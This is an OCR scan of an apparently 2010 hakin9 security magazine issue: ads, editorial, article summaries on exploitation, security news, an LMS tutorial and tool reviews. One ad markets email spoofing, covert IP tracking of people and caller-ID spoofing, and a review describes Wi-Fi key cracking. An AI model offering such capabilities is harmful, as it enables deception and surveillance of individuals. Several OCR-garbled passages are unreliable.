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SAINT's crisp new interface makes it even easier to use. 

•/ Integrated vulnerability scanning and penetration testing 

✓ Payment Card Industry (PCI) Approved Scanning Vendor (ASV) 
•/ Heterogeneous exploit and vulnerability coverage 

✓ Security tools module includes e-mail harvesting, social 
engineering trojan, e-mail forgery, and more 



Download a free white paper about integrated vulnerability assessment and 
penetration testing at www.saintcorporation.com/Hakin9 

Contact SAINT's sales team at 1 -800-596-2006 xOl 19 or sales@saintcorporation.com 



Examine. Expose. Exploit. 



Copyright ©2009 SAINT Corporation. All Rights Reserved. 



Secure 2010 



Some people say 2010 will be the year of security. After the 
world's economic crisis and growing possibilities that appear in 
the times of cloud computing and virtualization, companies and 
enterprises computers and data are put at risk. 

It not only concerns business - it affects individual users as 
well. Attacks on Twitter and other portals recently have shown us 
that nothing is safe, even though they do not contain any secret 
data or sensitive information. Why are they attacked? To show 
the security gaps? Give a proof of their power and unlimited 
possibilities? Either way, those things are happening. 

Recent attacks have shown that the security field needs to 
evolve much faster than all other branches of technology. We 
at hakin9 magazine are striving to give you the most recent 
information and solutions that can keep your private computer 
and data safe. 

In this issue we focus on exploits and exploitation methods 
that you may come across: mobile exploits, Null pointer 
dereferences. You will find articles on movement on the mobile 
exploit front, privacy keeping & exploitation methods, methods 
of secrecy, manipulating the network with PacketFu and much 
more. 

As usual Julian Evans, our IT security expert discusses 
malware trends expected in 2010 and Matthew Jonkman provide 
a great emerging threats section! 

As an addition you can read book and tool reviews -this time 
even more than usual. 

Enjoy! 
hakin9 team 
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Sb-iiiiiIhj / Uuluambhiij - Where toe hacker checks for weaknesses (open ports) on your network.. 

PejjitrHiJiijj - Wfiere you will e/ploit one of toe open ports found on your computer or firewall. 

AilimwiB - Gaining more access. For instance, th^ 
aiiacker can break into more sensitive administra- 
tor root accounts, install backdoors or Trojan 
horse programs, and install network sniffers to 
gather additional information, 
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showing his malicious 
behavior. 






PORT SNITCH 

PORTSNITCH takes care of the first two stages of computer hacking, with a few quick mouse clicks. 
PORTSNITCH not only looks for vulnerabilities on your compufer or network, it will perform a public 
information search for the "Target." The public search includes., but is not limited to: 



Facebook.com MySpace.com Youtube.com 

Amazon.com Google.com Yatioo.com 

News Searches Blog IP Searches 

Email Name Searches Criminal Searches Pictures Searches 

IPSNITCH 

IPSNITCH con 






IPSrlTCH wM\m of two pgwsrful programs in oris. Trie first powerful program is email spoofing. This allows you to send an email io anyone you'd lil'.e 
and make it appear to have corns from someone else. 



Trie second powerful program allows you to get anyone's IP address. With IPSi irrCH all you need i 

gsiiny. IPSI JITCH lots you send that person an email making trie email look IDs 1 came from someone else. Wfien a person opens iris email, 1! will auto- 
matically ts/t your cell phone arid/or email you trie person's personal IP address and trie ISP thai owns trie IP address. 

SPOOR IFr allows you to surf the irifsrnsi totally anoriymously by hiding your IP Address and displaying an IP Address thai can't be traced back to you. 
SPOOR IFI" is a sophisticated pro/y tenet. Although triers are thousands or free Proxy Servers on trie market today, they all can't be trusted. As an 
sample, some free pro/y servers will capture all the websites you visit as well as all the keys that you type. In other words, some pro/y servers can be 



used as spyware. 

TgtJeTsll will notify you by email or taut message when an IP address is online or offline. This includes: if trie IP address is online or online, trie ISP, arfd wil 
get a fingerprint of trie computer to help identify trie suspect's computer. 



RECQN is trie most advance network security auditing program on trie market today, RECQU is an active scanner, featuring high-speed discovery, 
configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. REGOPJ performs network scans using 
vulnerably check databases based on over 15,000 vulnerabilities. Security audits can take hours to perform. With FIECON you can start the audit and 
move on to other projects or personal time. When trie audit is complete it will ie/t you or email you to let you know thai trie audit is complete. 

jK&#J-J 

Hand down and thumbs up PC-211 is the most advance penetration testing program on trie market Like other USATT Security Suites products, you 
don't need to know anything about penetration testing, PC-211 uses different techniques to by pass a firewall, IDS and IPS systems. Just like with RECOi I 
when trie penetration test is complete it will M you or email you to let you know that iris audit is complete. 

Allows you to call any number in the United States or Canada (other countries coming soon) and havs any number sfiow up in trie persons caller ID. fbu 
can change your voice to male or female, record telephone calls, spoof ie/t messages and spoor emails. 
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ISO SUTI'WAKB 'I'D 'DamiLLDAD AiSU m£'±&HL 
All of the LJGATT Security Suites products arid services are web base. That means no matter what operating 
systems you choose Windows, Mac, Linux or even your web base cell phone, you can use any or our services, 

vizi _F£/a j vmt i^D'imis mij&s^ ami maxmv iz* 

Unless indicated by a we do not charge you for using any of our services if you do not get any results, 
As an example, if you use IPSNITCH arid we do get trie persons IP address you do not pay. If you use PO- 
21 1 and it is unable; io has'', in, you do not pay, You only pay AFfEfi we get you your resul 



UGATT Security is alv/ays adding tm ssrviKS end wMms, 



LI G ATT Security International 
www.LIGATT.com 

* - SPOOFEM is a per minute charge, A Spoof text and email messages are free with an account. SPOOFNET is a pay as you go service, 
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Data Mining as a Tool for Security 

JASON ANDRESS 

Given the current heightened state of security across the 
globe today, the ability to sift through data, search for key 
information and identify the occurrences of particular 
patterns is highly desirable. This capability, known as data 
mining, can be used to pinpoint anything from seasona 
grocery purchasing habits for individuals to the patterns 
of international telephone calls that might presage an act 
of terrorism. Data mining, simply, is a process that allows 
arge volumes of data to be searched for patterns and 
relationships in or among sets of data. 

Movement on the Mobile Exploit Front 

TAM HANNA 

All of the exploits and security issues mentioned in this article 
are the results of plain carelessness of the responsible 
programmer. Had they been aware of the most basic elements 
of security, these would have never happened. Unfortunately, 
developers working at carriers and device manufacturers still 
see security as an afterthought. Their thinking goes along the 
ines of nobody bothered to perform large-scale attacks on us 
so far, so why should they do so now? 

Assessing Microsoft Office 
Communication Server R1/R2 with OAT 

ABHIJEET HATEKAR 

Continuous education and awareness about advantages of 
Penetration Testing and Vulnerability Assessment services, 
has led enterprises to finally allocate yearly budgets for their 
security audits. However these security audits are limited to only 
data networks of enterprise, which leaves Voice (VoIP network), 
unsecure. 
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32 Manipulating The Network with 
PacketFu 

KEITH LEE 

PacketFu is currently included as a library inside Metasploit 
pentesting framework which is extremely useful if you are planning 
to code custom networking related modules in metasploit. The 
best way to use PacketFu is to run it in Ubuntu or to download a 
copy of Backtrack 4. 
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Code Listings 

As it might be hard for you to use the code 
listings printed in the magazine, we decided 
to make your work with Hakiny much easier. 
We place the complex code listings from the 
articles on the Hakiny website 
(http://www.hakin9.org/en). 



Mobile Web: Privacy Keeping and 
Exploitation Methods 

MAURO GENTILE 

Inevitably, most of the readers will think that the purpose of this article is 
to present arguments regarding vulnerabilities related to the protocols 
for Bluetooth, or even how to intercept telephone calls. In fact, this article 
takes an entirely different approach. The main objective is to highlight the 
opportunity to use our phone as a terminal to connect to the network and 
find possible vulnerabilities of Web applications by putting in place some 
mini attacks wherever we are. 

Intelligence Report: Analysis of a Spear 
Phishing Attack 

ADAM PRIDGEN AND MATTHEW WOLLENWEBER 

A spear phishing attack occurs when an attacker sends targeted emails 
tailored to a specific user or organization. The execution of the attack 
can vary by the underlying goals of the attacker. In some cases, the goa 
may be to gain information from a specyfic user. In other cases, the 
objective may be to gain access to target networks. Generally, the attack is 
conducted by convincing the user to either download and run a malicious 
attachment or interact with the adversaries. 

DEFENSE 

Methods of Secrecy 

TAM HANNA 

Keeping data secret has been important from the very moment knowledge 
was able to infer a benefit to others. Ancient Roman ruler Julius Caesar 
used an encryption scheme called a substitution cipher. Encryption ciphers 
like the one used by Caesar are but one of the most primitive of methods 
which can be used for keeping data safe. This article is the beginning of a 
series which will introduce you to a variety of topics related to data security. 

Exploiting NULL Pointer Dereferences 

MARCIN JERZAK AND TOMASZ NOWAK 

The landscape of kernel exploitation technigues is very wide and continues 
to evolve. Almost like an arms race kernel developers apply more and 
more protection measures to cover all the attack vectors while bad guys 
(and others) are inventing new attacks, new exploitation methods and ways 
to bypass the existing mechanisms. Almost like an arms race. 

Bypassing Hardware Based Data Execution 
Prevention on Windows 2003 Service Pack 2 

DAVID KENNEDY 

A short history on Data Execution Protection (DEP): it was created in order to 
prevent execution in areas of memory that aren't executable. Before trying 
this, I highly suggest reading skape and Skywing's areas of memory Article 
in Uninformed called Bypassing Windows Hardware-Enforced DEP 
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BEWARE FIREFOX MAL- 
EXTENSIONS 

Malware writers are taking advantage 
of a Firefox mechanism that allows 
extensions to be loaded invisibly to the 
user, Symantec has warned. According to 
Symantec senior engineer Candid Wuest, 
the company has recently observed an 
increase in malware that drops malicious 
BHOs, Firefox extensions, and even 
Opera user scripts... to maximize their 
impact on a user's machine. 

One avenue that's taken is to drop the 
malicious extension directly into Firefox's 
components directory. This means it will 
be automatically loaded with the browser, 
but will not show up in the Add-ons 
window. Consequently, users are unlikely 
to know that the extension has been 
added, or see a mechanism to remove it. 

WGest also noted that all of the 
interesting information (such as credit 
card numbers or passwords) is usually 
entered through the browser, so it's a 
perfect playing field for attackers. 

While access to the components 
directory will be denied in Firefox 3.6 
(requiring the packaging of add-ons as 
XPI [cross platform installer] files and 
forcing them to appear in the Add-ons 
window), that won't rule out the possibility 
of malicious extensions - it will just 
make it harder to create a stealthy 
mal-extension. Even if an extension 
does install in the conventional way, that 
doesn't mean it isn't malicious. 

A paper co-authored by Wuest 
and Elia Florio of Italy's Data Protection 
Authority describes - among other things 
- a number of malicious extensions that 
carry out activities such as logging and 
forwarding all form submissions that 
include a password field, or forwarding all 
URLs visited. 



CHINA WARNS OF NEW WORM 
VIRUS 

China's anti-virus authorities on Sunday 
warned computer users to guard against 
new mutation of worm virus, which could 
infect various documents in system. 

The virus, Worm_Piloyd.B, could infect 
documents like exe, html and asp and 



prevent the system from restoring the 
affected documents, according to the 
Tianjin-based National Computer Virus 
Emergency Response Center. 

The virus could force the system to 
download other viruses from designated 
websites, according to the center. 



FIREFOX BLOCKS ROGUE ADD-ON 
APPS 

The browser Firefox is having some 
major work to tweak the code base 
(this is what drives the browser) to help 
block rogue add-ons from loading in 
the browser's application components 
directory. 

Consumers will certainly be pleased 
to hear this news as this change will 
boost browser security. Another upside 
is that this will most certainly block 
developers and software vendors from 
silently installing Firefox add-ons without 
explicit user permission. Browser add- 
ons also have a dramatic effect on 
performance, in some cases crashing 
the browser or even worse corrupting it. 

TIP: Have more than one browser i.e. 
Google Chrome or Internet Explorer for 
example in the event of a browser crash. 

The change will be introduced 
in Firefox 3.6 to block third-party 
applications from adding their code 
directly to the components directory, 
where much of Firefox's own code is 
stored. For more information we suggest 
you visit Mozilla's security blog 



MICROSOFT CONFIRM WINDOWS 
7 EXPLOIT 

Microsoft has issued a security advisory 
which acknowledges that Windows 7 and 
Windows Server 2008 Release 2 can be 
exploited by a denial-of-service attack. 

Microsoft has swiftly released 
Security Advisory 977544 with pre-patch 
mitigations and a confirmation that the 
detailed code could provide a roadmap 
for hackers to cause Windows 7 and 
Windows Server 2008 R2 systems to 
stop responding until manually restarted. 

As there is no patch, Microsoft 
recommends that affected users block 
TCP ports 139 and 445 at the firewall. 



Windows users should also block all 
SMB communications to and from the 
Internet to help prevent attacks. 



NEW FORM OF BIOS ATTACK 
Researchers from Core Security 
Technologies have uncovered a new 
form of Bios system attack using a 
malicious application called a rootkit. The 
researchers are also claiming that this 
type of attack renders anti-virus useless 
as it attacks all types of common apart 
from the newer types of Extensible 
Firmware Interface Bios (EFIB) in use 
today. 

The researchers created a script that 
could be flashed onto any Bios which 
would then install the rootkit. If hackers 
could find a way to install a rootkit in the 
Bios, this would mean anti-virus software 
would be unable to detect it. 

There are some obvious fall backs 
with this attack vector. An attacker will 
need administrative control; however 
you could achieve this by pre-installing 
another virus which would allow malware 
to be flash a rootkit directly onto the Bios. 

Even if the initial virus was detected 
and removed, the computer would still be 
under remote control. A full wipe of the 
hard drive and complete reinstallation of 
the operating system would not remove it, 
the researchers warned. 

The research concludes that if this 
type of attack occurred, then the only safe 
method of removal would be, removing 
the Bios chip. ID Theft Protect suggests 
you lock down the Bios chip from flash 
updates by password-protecting the 
system against this type of unauthorised 
attack. 

The attack vector is also usable 
against virtual systems, the researchers 
said. The Bios in VMware is embedded 
as a module in main VMware executable, 
and thus could be altered. 



RANSOMEWARE TROJAN SEARCH 
EXPLOIT 

A new strain of Trojan called Ramvicypre 
encrypts recently-opened files on 
compromised Windows PCs. It is a little 
unusual in that this malware encourages 
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infected users to search the Web for a 
possible solution. 

Initially this Trojan demanded a 
ransom (you pay some dollars and the 
virus is removed - in fact the virus is 
never removed) for a decryption key to 
unlock the folder and files. 

The malware writers use poisoned 
search to further infect a users' PC. 

At ID Theft Protect, we have identified 
a number of users who had been 
infected with the Vicrypt Trojan. A recent 
example is where the Windows system 
folder was encrypted with this Trojan. The 
PC wouldn't boot up as critical Windows 
system files could not be accessed, so 
we had no choice but to rebuild the PC. 
This was actually a first for us! 

Unfortunately the only method 
we found for successfully removing 
this Trojan was from Symantec: http: 
//www.symantec.com/business/security_ 
response/writeup.]sp?docid-2009- 
102921-3210-99. Note: This will not work if 
your Windows system has been infected. 

You will have your encrypted 
folders/files back in under 5 minutes, 
so you can carry on safely surfing 
the Web. Note: Vicrypt is in no way 
connected to a genuine company called 
www.exguisysltd.com which appears to 
have inadvertently been linked to this 
Trojan. 



RUSSIA IS MOST FRAUDULENT 
COUNTRY 

Russia has the world's most fraudulent 
economy and attempts to stamp out 
white-collar crime have done little to stop 
its spread during the global financia 
downturn, PricewaterhouseCoopers 
(PwC) said in a survey. 

Seventy-one per cent of Russian 
respondents to PwC's global economic 
crime survey said they had been subject 
to economic crime in the past year, more 
than in next-ranked South Africa, Kenya, 
Canada and Mexico. 

Russian fraud was 12 percentage 
points above its previous showing in 
2007, PwC said, and was well above the 
global average of 30 per cent, the Centra 
and Eastern European average of 34 per 
cent and BRIC countries' 34 per cent. 



Japan, Hong Kong, Turkey and the 
Netherlands featured as the territories 
which reported the lowest levels of fraud 
with 9.6 per cent, 13 per cent, 15 per cent 
and 15 per cent respectively. 

PwC said more than 3,000 
respondents from 54 countries 
participated in its survey. 

Source: ID Theft Protec 



ADOBE TO BE THE TOP TARGET IN 
2010 

Security has changed. The permiter is 
no more a perimeter, and wherever a 
perimeter still exist it is better protected 
by firewalls and IDS that after years and 
years of preaching are at least employed 
in large companies. With this in mind, 
Hackers have changed target. People 
leak their privacy in change of the fifteen 
minutes of fame thanks to Facebook: the 
hackers attack third-party applications. 

People use Twitter to communicate: 
Hackers hijack twitter accounts and 
spread malwares. 

Now that even Microsoft Office 
documents are less prone to infections, 
Adobe Reader and Adobe Flash. Have 
become the first target for hackers. 

Flash and PDF's files are everywhere: 
on PC's as well as on smartphones, 
tablets and even ebook readers. 
According to McAfee 2010 Threat 
Prediction report, Adobe's products will be 
the most hit in the 2010. 

Even Adobe CTO Kevin Lynch, 
admitted that the company's product are 
more and more under attack. 

Proof that the forecasts are correct 
is the successful attack to a comics 
strip syndication service delivering strips 
in flash format. Hackers broke into the 
servers delivering the flash embedding 
malicious code exploiting a Oday in 
Adobe Flash. 



HOWARD SCHMIDT THE NEW 
OBAMA'S CYBER-SECURITY CZAR 

Obama has named Howard Schmidt 
new Cyber-security czar 

Schmidt, former CSO at Microsoft 
and eBay but also Bush adviser, has at 



least 40 years experience In the field and 
is probably one of the most respected 
authorities in the industry. 

Obama, who after few days from 
his elections affirmed that securing 
computer networks would be a nationa 
security priority, left the position vacant for 
months, after Melissa Hathaway resigned 
in August 2009. 

Mr. Schmidt name was picked from a 
pool of candidates. Many of them refused, 
according to Washington Post, because 
of the little real authority compared to the 
responsibility of the position. 

In the end, Schmidt himself, left 
a similar position in 2003, frustrated, 
according to colleagues. 



TWITTER DEFACED BY IRANIAN 
CYBER ARMY 

Twitter foundation story is not exactly the 
two guys in a garage stereotype. 

Founders are experienced tech- 
entrepreneur guys that surprisingly 
enough didn't give security the right 
importance at design time. 

A number of security flaws found by 
teenagers in the past few months led to 
accounts hijacking and phishing attacks. 

Nothing new for a social network, until 
the iranian cyber army group left the home 
page of the social network with a black 
background, an Islamic flag and a clear 
message: This site has been hacked. 

Following the accident, twitter.com 
and other subdomains were down and 
the twits delayed or blocked. 

The attack, as described by Twitter 
official blog, hit the DNS servers in the 
most simple way: an easy to crack 
password gave access to the DNS panel 
from where the hackers have been able 
to redirect the domain to another server. 

Most of the twitterers, though, didn't 
notice anything suspicious at first: most 
of Twitter clients use direct IP's to connect 
to the servers, instead of domain names. 

A defacement, in the hackers 
community, is a demonstration. Next 
time the attack could be much more 
dangerous, for Twitter as a company and 
for the millions fans of the social network. 

Armando Romeo 
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EHACK LAB - LMS ACCESS TUTORIAL 



This short tutorial will guide you through creating a new account on the eHack LMS (Learning Management System), show you how 
to enroll in your courses, and download the prep material. 

1. Watch the LMS instruction video on www.tinyuri.com/ehackiabims 

2. Using your web browser Navigate to http://www.ehackiab.com/ims 

This is the homepage where you can see all the courses we offer our sponsors, website calendar, as well as news and blog updates. 




As it states in the top right of the page next to language choice. 
As you are currently "not logged in." 




Proceed to the login page by clicking the (Login) link 
This will take you to a new page where you may either login to 
an existing account or create a new account. In this tutorial, we 
will be creating a new account to later be enrolled in courses. 




This page will look like this: 



Is this your first time here? 

Hi' foi ful access lo courses roull need to take a minute to a eale a new account Mr 
joeusei! on tins weo s4e Each oitne individual courses may also have a one-time 
'enrolment *ty which you worn n«d until later Htre are Die steps 

1 F« Bid tM Mw Account form w(h your (Maft 

2. AnwHlwIte mne&altty senl to ynur < 

2 Head v*ur mid and c*cl on he web M t canM 
< vQr aeccuM « I be centrmed you we be ta; 
5 New |M m* court* yftu warns partcpMe h 
£ if you are promoted tar an 'enmnerit ley" - ui« tr 

Una wl "eorar you n Ae eourte 
T Vw can new accow IftC hjl c«ir»c Frpm rwj « on yog wl flnly ricttJ to ertcr ypw 
pcrwvl irtcma me arttf PMMWI I n [fif Ignmon thai nje !: t; r re KCCU any 
ennt you tviva anro»td n 



Chaos* your usamamj and password! 

L.it-ni.irne* efiacKdemo 
Password" 



Emai adktress" 
Ema I (aga n)' 
first name* 

Surname" 

Cityflown' 

Country* Sfll&rtacDuritr, 



I QMte rn^ raw aaaHrt" ' Canon | 

IT 

You are now prompted with a screen asking for some basic account 
information with which the new account may be created from. 



You need to confirm your logir 

.An email should nave been senl to your address at^^^^^^^^^B 

It contains tat v instructions 1o co rnphtie your registration 
if you continue lo nave drfncuir/. contact me site administrator 

A confirmation link will be sent to the email you specified in your account. You 
must follow this link and confirm your email before you can access the LMS. 



of mai' 



u h-tt b«n ErqutMrd u "Stcurinf van frredca. rijliii ud pcid 



blip wu-K- nbicUib rnn trcn-lojyn nnn fiira pi 
JiEn=qBPfi:cKol][llV-> fiiidEd.mii! - 



In mow Bud ptepuai. ihii ibHifd ip&eir it a Mint in 
which cm juit did; cm 1 f Jul -dorm't n - t-ifc, 
tl n i :i ud pmr chf iddm-t inio ikr iddini 
bit « ia« i*p of your w<o tamer w\a&vu 



The email looks like this: 

Follow the link and you will then be 

logged into the LMS. 

You must now use your enrollment 

key to register yourself with the 

course. 



Begin the creation 
of a new account. 
Click the "Create 
new account" 
button 
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Click on the course 
with which you are 
to be enrolled. In this 
case, the CHFI 



ptomon nuri you ifKwa Ium received nom CA Detro 



- 



i jwen v 



Enter the enrollment key that was provided by your instructor, and click 
the "Enroll me in this course" button. You are now successfully enrolled 
in your course. 



You now have access to the LMS, your course, and all the tools and resources 
you need to begin your course. This tutorial will be followed up with another short 
tutorial covering the connection to remote attack lab. 



A IF THE CD CONTENTS CANT BE ACCESSED AND THE 
DISC ISN'T PHYSICALLY DAMAGED, TRY TO RUN IT ON AT 
LEAST TWO CD DRIVES. 
IF YOU HAVE EXPERIENCED ANY PROBLEMS WITH THE CD, E-MAIL: 
CD@HAKIN9.ORG 

i 
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URL: www.secpoint.com 
Price: 999 Euro 



SecPoint Portable 
Penetrator PP3000 



Along with the popularity of wireless 
networks and the mobile devices 
capable of connecting to them, 
the need for supplying a proper security level 
arises. To satisfy this need, SecPoint has 
offered a new device - Portable Penetrator 
PP3000. Its job is to analyze and verify the 
level of any wireless network you choose. 
The solution has tools for scanning wireless 
networks in your environment and helps to 
perform complete audits of scanned networks. 
It is able to crack security keys encrypted 
with WEP, WPA or WPA2. It manages not only 
to find gaps in security, but also provides all 
necessary data needed to fill these gaps. All 
the information regarding the level of security, 
its weak points and suggested solutions of 
particular problems is presented in a report, 
which supplies valuable information not only for 
those with technical knowledge but also those 
without it. 

The Portable Penetrator PP3000 is based 
on a Dell Inspiron Mini 10v netbook and 
wireless adapter eguipped with a rather large 
antenna and USB port. A small netbook comes 
with 10.1" screen, a battery capable of 5-6 
hour work and an Intel Atom platform which 
provides satisfactory comfort of work and a 
fully unconstrained mobility. The platform tested 
had the Linux system installed. The previously 
mentioned wireless adapter's antenna has a 
strength of 8dBi and the adapter itself can be 
mounted to the back of the screen using a 
simple but effective suction cup. The adapter is 
connected to the computer by a supplied USB 
cable. 

The pre-installed software for the 
Portable Penetrator is browser based. The 
user interface was designed to present all 
valuable information in an intelligible way. After 
completing a short setup process in which 
you set your network parameters and register 
your software, you can start the scanning 
process. The device is capable of discovering 
all networks in range - those hidden as well 
as those with a very weak signal. It presents 
detailed information about these networks such 
as the name, type of encryption, signal strength 
and the number of connected users. 



Once you have chosen the network to 
work with, it is time to verify its security level. 
Depending on the type of encryption and the 
number of connected users you can choose 
a different methods of attack. If you choose a 
dictionary based method you can find such 
exotic languages as Iranian or Vietnamese. 
The supplied dictionaries are a very strong 
part of the solution. The progress of cracking 
the security key of a chosen network can be 
easily monitored. The data consists of such 
parameters as the speed of key generation, 
currently tested key or number of keys already 
tested. The speed of key generation heavily 
depends on the platform used. 

With our tested sample with Dual core 
Atom with 1.6 GHz it was 250 keys per 
second for a WPA encrypted network. If the 
password is discovered it is presented to the 
user. The generated keys use alphanumeric 
characters so keys with different combination 
of letters and numbers can also be 
discovered. The methods used for wireless 
network cracking are based on those used 
by regular hackers, utilizing such technigues 
as a denial of service for example. Security 
professionals will certainly appreciate the 
ability of choosing different types of attacks 
as well as a huge database of exploits and 
factory shipped dictionaries. For those who 
have less experience the producer supplied 
detailed guides on how to use the product. 
When connected to the Internet the Portable 
Penetrator can stay up to date by updating its 
firmware and signature databases. 

Whether you're a security professiona 
or a novice, Portable Penetrator PP3000 is a 
device which is a complete solution for auditing 
and improving the level of security of wireless 
networks. Thanks to built-in report module you 
will have all the documentation of the security 
audits you have conducted. The product costs 
999 EUR, a great value for a complete solution 
like Portable Penetrator PP3000. 
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^ netikus.net. 



NETIKUS.NET ltd 

NETIKUS.NET ltd offers freeware tools and 
EventSentry, a comprehensive monitoring so- 
lution built around the windows event log and 
log files. The latest version of EventSentry al- 
so monitors various aspects of system health, 
for example performance monitoring. Event- 
Sentry has received numerous awards and is 
competitively priced. 

http://www. netikus. net 
http://www. eventsentry. com 



HliOHOI.Mil 



100% I'WtK HACKEll 
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Heorot.net 

Heorot.net provides training for penetra- 
tion testers of all skill levels. Developer of 
the De-ICE.net PenTest LiveCDs, we ha- 
ve been in the information security indu- 
stry since 1990. We offer free, online, on- 
site, and regional training courses that can 
help you improve your managerial and Pen- 
Test skills. 

www.Heorot.net 

e-mail: contact@heorot.net 



elcqmsqft ElcomSoft Co. Ltd 

ElcomSoft is a Russian software developer 
specializing in system security and password 
recovery software. Our programs allow to re- 
cover passwords to 100+ applications incl. MS 
Office 2007 apps, PDF files, PGP, Oracle and 
UNIX passwords. ElcomSoft tools are used by 
most of the Fortune 500 corporations, military, 
governments, and all major accounting firms. 

www. elcomsoft. com 
e-mail :info @elcomsoft.com 



^♦vintegris 



VINTEGRIS S.L 

VINTEGRIS S.L is a company dedicated to IT 
security in Spain. We focus on development of 
authentications, web access control, password 
management and synchronization, and digital 
signature systems, to integrate into the IT of 
our customers. We also perform integration of 
third-party recognized security products. Most 
of our consultants are CISA and CISSP certi- 
fied and our company is ISO/27001 certified. 
http://www. vintegris. com 
e-mail: info@vintegris.com 



Netsecuris Inc. 

Who's watching your network? 



Netsecuris 

Netsecuris is a professional provider of mana- 
ged information security and consulting servi- 
ces that focuses on ensuring the security of 
your networks and systems. Services inclu- 
de managed firewall/intrusion prevention, ma- 
naged email security, network penetration te- 
sting, vulnerability assessments, and informa 
tion systems risk assessments. 

http://www. netsecuris. com 
email: sales@netsecuris.com 



PRIVEON 



J 



Priveon 

Priveon offers complete security lifecycle se- 
rvices - Consulting, Implementation, Sup- 
port, Audit and Training. Through extensive 
field experience of our expert staff we ma- 
intain a positive reinforcement loop between 
practices to provide our customers with the 
latest information and services. 



http:/ '/www. priveon. com 
http://blog.priveonlabs. com/ 



JOIN OUR EXCLUSIVE CLUB AND GET: 



i Hakin9 one year subscription 

i classified ad for duration of your subscription 

i discount on advertising 



You wish to have an ad here? 
Join our EXLUSIVE&PRO CLUB! 
For more info e-mail us aten@hakin9.org or go to www.hakin9.org/en 
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Url: http://www.avanquest.com 
Cost: $29.00 



Double Anti-Spy 



When I received the link for Double 
Anti-Spy I did a little check around on 
the Internet, as this was a product 
hadnt heard of before. According to the website, 
this product utilises exclusive .double scan" 
technology which is an interesting concept as 
usually run 2 different anti-spyware applications 
on my machine, 1 in a live state and the other 
as a backup scan. 

I decided to install this software onto a 
freshly installed Windows XP SP3 Dell Latitude 
Pentium III machine (I know its old, but it still 
works well!) 

Installing the software went smoothly 
enough, and then I had a choice of 3 scans 
to make on my machine. A quick scan that will 
only scan the important locations, a full scan to 
scan all the hard drives on the machine and a 
custom scan that allows the user to specify what 
they would like scanned. A full system scan is 
recommended after installation and updating 
the definitions to find all traces of spyware that 
might be located on the computer system. Upon 
reboot I did an initial full scan of the machine, 
didnt expect it to find anything as I had only 
downloaded service pack updates, but it did 
identify two potentially suspicious cookies. 

Now it was time to test it against some 
spyware properly. Using a website available 
called Spycar, which was designed with exactly 
this in mind, (http://www.spycar.org/Spycarhtml) 
by offering 17 different tests that all anti- 
spyware should really pickup and protect you 
against 

Auto Start Tests 

The following tests were performed on Internet 
Explorer 8, the website tries to install a registry 
key at various locations on your machine and 
execute it. For example 

■ HKLM\Software\Microsoft\Windows\ 
CurrentVersion\Run 

■ HKCU\Software\Microsoft\Windows\ 
CurrentVersion\Run 

Internet Explorer Configuration 
Change Tests 

Again using Internet Explorer 8, and see if it was 
possible to change the current configuration of 
your web browser. For example 



Try to change your default home page 
Try to lockout users from changing the 
default home page in IE 



m IE 



Network Configuration Change 
Test 

The following test were performed on Internet 
Explorer 8 to see if it is possible to make 
changes to your Hosts file. 

When trying to add an entry to your hosts 
file, every one of these tests was captured 
and blocked by Double Anti-Spy, they were 
immediately quarantined as soon as they 
were executed on the web page. Double Anti- 
Spy doesnt just protect you whilst you are 
out on the Internet, it also protects your emai 
client as well, whether you are using Microsoft 
Outlook, Windows Mail or Mozilla Thunderbird 
Double Anti-Spy will integrate with it. 

You are able to schedule scans on your 
machine, just like your anti-virus, and your able 
to create white and blacklist of your files, to 
prevent you being prompted to remove the 
same files all the time (if you feel that you are 
safe to keep them). 

There is a lot of chatter about this product 
(and others by avanquest) on various 
forums concerning its validity to say it is 
Number 1 most effective in head to head 
tests. It uses Sunbelt's VIPRE (Engine A) + 
Outpost AntiSpyware combined with Virus 
Buster SDK (Engine B) as its scanners, and 
individually they have both performed very 
well in their respective tests. Even though I 
was using a quite old laptop, I didnt notice 
any real performance drop whilst scanning 
and surfing at the same time. Overall I liked 
the product, as it would save me time from 
having to unload one of my current anti-spy 
programs to then run another on a manua 
scan. 
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Web Site Security 
Audit 



Trying to review a product that has no 
software to download and nothing to 
install was a new concept to me, but 
it was a very pleasant experience. 

Setting up the Web Site Security Audit 
has to be one of the easiest processes to go 
through. You literally complete an online form 
for your email and password, and other contact 
details. Every level of service is available on an 
initial 1 5 day trial, which is more than enough to 
enable to see how useful this solution really is. 

Once I logged into the site, you are given a 
simple menu to navigate (Image 1) and I was 
immediately presented with the results of the last 
scan that was completed. (Image 2). 



Recommended Solution 
Test ID 





<V 1 Secure Site 

\S 12-Nov-2009 




Latest Scan Results 


My Account 




;Veb Site Testing 






Security Seal 






Contact 






News 





The full audit result is clear and concise. 
You are provided with the vulnerability scan 
results with a total score shown and then a 
grading (A, B etc). The the summary is broken 
down into High, Medium and Low areas, by 
clicking on the details in this section, you are 
link jumped to further down the web page 
where the full details of the vulnerability are 
shown. Each of the vulnerabilities found provide 
the following information: 

■ Name of the vulnerability 

■ Port in use 

■ Summary 



You have the option to receive notifications when 
tests have been completed with a choice of High 
Risk only, any risks, whenever a scan completes 
and you can have a list of the tests that have 
been conducted. These notifications basically 
point you to goto the site to grab the detailed 
information of the scan that has been completed. 

Even if your customer decides to stop 
receiving the service from you, all the details 
are archived while your account is kept live. With 
over 6,300 remote vulnerabilities the testing 
that is being conducted on your site are above 
and beyond the usual PCI reguirements and 
they are adding new tests all the time. Once 
you have completed a test on a site, there is a 
nice option to offer a link back to a Secure Sea 
image, which allows your customers to prove 
that their site is safe from current threats (but 
you should only allow customers to have this, if 
their score is high enough). 

If you ever have any issues with the 
product/service there is a contact form built 
in, and their support is 24/7. 1 received prompt 
responses regarding the guestions I had 
concerning the services available. 

was impressed with the simplicity of the 
services being offered, once it was configured it 
is literally fire and forget technology, as you don't 
really need to go back to the site apart from 
when you want to add more domains to it or to 
grab the report information for your customers. 
Having the reports emailed to you in pdf format 
at the end of the audit was a nice touch, and 
was very concise in the details provided. From 
the test details and the vulnerabilities found, 
through to a full port list of what was scanned, 
and how each port actually responded. 



Scan Results 


Hostname 


Scan date 


2009-11-05 


Scan Status 


Done 


Vulnerability Score 


100.00 (Af) W 


Vulnerability Summary 


High 


*p 0 


Medium 


5? 0 


Low 


|t| „ MySQL Server Version Detection 




" ^ 404 check 


Total 


2 




URL: http:// 

www.beyondsecurity.com/ 
vulnerability-scannerhtml 
Pricing per month 
Basic: $29.95 
Standard: $59.95 
Advanced: $119.95 
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Url: http:// 

www.lostpassword.com/ 
kit-forensic.htm 
Cost: $795 (includes 1 
